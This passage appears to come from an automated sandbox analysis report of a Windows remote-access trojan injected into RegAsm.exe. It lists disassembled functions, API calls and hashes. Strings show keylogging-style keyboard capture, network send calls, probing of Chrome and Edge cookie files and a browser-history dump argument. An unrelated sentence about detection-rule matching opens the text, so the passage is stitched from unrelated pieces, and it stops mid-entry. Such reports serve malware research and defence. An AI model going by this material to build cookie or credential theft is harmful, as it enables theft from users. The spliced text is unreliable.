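Matching on the parsed key, value and data rather than on the literal string from the report is what keeps the rule alive across the trivial rewrites an operator can make; a value of 1 or a `query` verb is legitimate administration and is deliberately not flagged.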
                                  Strings
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                  • SG, xrefs: 00407715
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  • API String ID: 0-643455097
                                  • Opcode ID: 534232ae4986bc0cd44d5d9dbb6e579f37bf6e7b645008295a27304146529b35
                                  • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                  • Opcode Fuzzy Hash: 534232ae4986bc0cd44d5d9dbb6e579f37bf6e7b645008295a27304146529b35
                                  • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                  • SetEvent.KERNEL32(?), ref: 0040512C
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                  • CloseHandle.KERNEL32(?), ref: 00405140
                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                  • String ID: KeepAlive | Disabled
                                  • API String ID: 2993684571-305739064
                                  • Opcode ID: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                  • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                  • Opcode Fuzzy Hash: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                  • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                  APIs
                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                  • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                  • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                  Strings
                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                  • API String ID: 3024135584-2418719853
                                  • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                  • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                  • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                  • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                  APIs
                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: GetCursorInfo$User32.dll$`#v
                                  • API String ID: 1646373207-1032071883
                                  • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                  • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                  • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                  • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                  • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                  • Opcode Fuzzy Hash: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                  • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                  APIs
                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                  • _free.LIBCMT ref: 0044943D
                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                  • _free.LIBCMT ref: 00449609
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                  • String ID:
                                  • API String ID: 1286116820-0
                                  • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                  • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                  • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                  • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                  APIs
                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                  • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                    • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 4269425633-0
                                  • Opcode ID: f228ff349881c5e95adb389dcff9344117252c23684542f11b6a3310bcbf0aa2
                                  • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                  • Opcode Fuzzy Hash: f228ff349881c5e95adb389dcff9344117252c23684542f11b6a3310bcbf0aa2
                                  • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                  • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                  • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                  • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                    • Part of subcall function 004461B8: HeapAlloc.KERNEL32(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                  • _free.LIBCMT ref: 0044F43F
                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                  • String ID:
                                  • API String ID: 2278895681-0
                                  • Opcode ID: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                  • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                  • Opcode Fuzzy Hash: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                  • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                  APIs
                                  • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4DE
                                  • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4EA
                                  • WriteFile.KERNEL32(00000000,00000000,00000000,00406FC0,00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4FB
                                  • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C508
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseHandle$CreatePointerWrite
                                  • String ID:
                                  • API String ID: 1852769593-0
                                  • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                  • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                  • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                  • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                  APIs
                                  • GetLastError.KERNEL32(?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044831E
                                  • _free.LIBCMT ref: 00448353
                                  • _free.LIBCMT ref: 0044837A
                                  • SetLastError.KERNEL32(00000000), ref: 00448387
                                  • SetLastError.KERNEL32(00000000), ref: 00448390
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$_free
                                  • String ID:
                                  • API String ID: 3170660625-0
                                  • Opcode ID: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                  • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                  • Opcode Fuzzy Hash: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                  • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                  APIs
                                  • _free.LIBCMT ref: 00450A54
                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                  • _free.LIBCMT ref: 00450A66
                                  • _free.LIBCMT ref: 00450A78
                                  • _free.LIBCMT ref: 00450A8A
                                  • _free.LIBCMT ref: 00450A9C
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                  • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                  • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                  • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                  APIs
                                  • _free.LIBCMT ref: 00444106
                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                  • _free.LIBCMT ref: 00444118
                                  • _free.LIBCMT ref: 0044412B
                                  • _free.LIBCMT ref: 0044413C
                                  • _free.LIBCMT ref: 0044414D
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                  • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                  • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                  • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: PkGNG
                                  • API String ID: 0-263838557
                                  • Opcode ID: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                  • Instruction ID: da8fb74aa53f7b39327717419ea6793f6800af9799f3d5c2cf6102f7e15971fb
                                  • Opcode Fuzzy Hash: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                  • Instruction Fuzzy Hash: 1451C171D00209AAEF109FA5D885BAFBBB8EF45314F14015FE905A7291CB38D911CBA9
                                  APIs
                                  • _strpbrk.LIBCMT ref: 0044E7B8
                                  • _free.LIBCMT ref: 0044E8D5
                                    • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,?,?,?,?,?,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                    • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD8C
                                    • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000), ref: 0043BD93
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                  • String ID: *?$.
                                  • API String ID: 2812119850-3972193922
                                  • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                  • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                  • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                  • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CountEventTick
                                  • String ID: !D@$NG
                                  • API String ID: 180926312-2721294649
                                  • Opcode ID: c9ce5fe4b700c23384727500752ca22de78a476bceab64b48e8ba843591519b4
                                  • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                  • Opcode Fuzzy Hash: c9ce5fe4b700c23384727500752ca22de78a476bceab64b48e8ba843591519b4
                                  • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                  APIs
                                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                    • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFileKeyboardLayoutNameconnectsend
                                  • String ID: XQG$NG$PG
                                  • API String ID: 1634807452-3565412412
                                  • Opcode ID: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                  • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                  • Opcode Fuzzy Hash: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                  • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                  • _free.LIBCMT ref: 004435E0
                                  • _free.LIBCMT ref: 004435EA
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$FileModuleName
                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  • API String ID: 2506810119-1068371695
                                  • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                  • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                  • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                  • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                  APIs
                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BBFE,?,00000000,FF8BC35D), ref: 0044B952
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B980
                                  • GetLastError.KERNEL32 ref: 0044B9B1
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharErrorFileLastMultiWideWrite
                                  • String ID: PkGNG
                                  • API String ID: 2456169464-263838557
                                  • Opcode ID: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                  • Instruction ID: 31ac96f82a5847659344ef20b41dc67af7a50504b34fbd786f6314a6cc22fa3b
                                  • Opcode Fuzzy Hash: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                  • Instruction Fuzzy Hash: B13161B5A102199FDB14CF59DD819EAB7B9FB08305F0444BEE90AD7251D734ED80CBA4
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                  • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                  • String ID: /sort "Visit Time" /stext "$0NG
                                  • API String ID: 368326130-3219657780
                                  • Opcode ID: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                  • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                  • Opcode Fuzzy Hash: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                  • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                  APIs
                                  • _wcslen.LIBCMT ref: 00416330
                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                    • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                    • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _wcslen$CloseCreateValue
                                  • String ID: !D@$okmode$PG
                                  • API String ID: 3411444782-3370592832
                                  • Opcode ID: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                  • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                  • Opcode Fuzzy Hash: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                  • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                  APIs
                                    • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                  Strings
                                  • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExistsFilePath
                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                  • API String ID: 1174141254-1980882731
                                  • Opcode ID: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                  • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                  • Opcode Fuzzy Hash: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                  • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                  APIs
                                    • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                  Strings
                                  • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                  Memory Dump Source
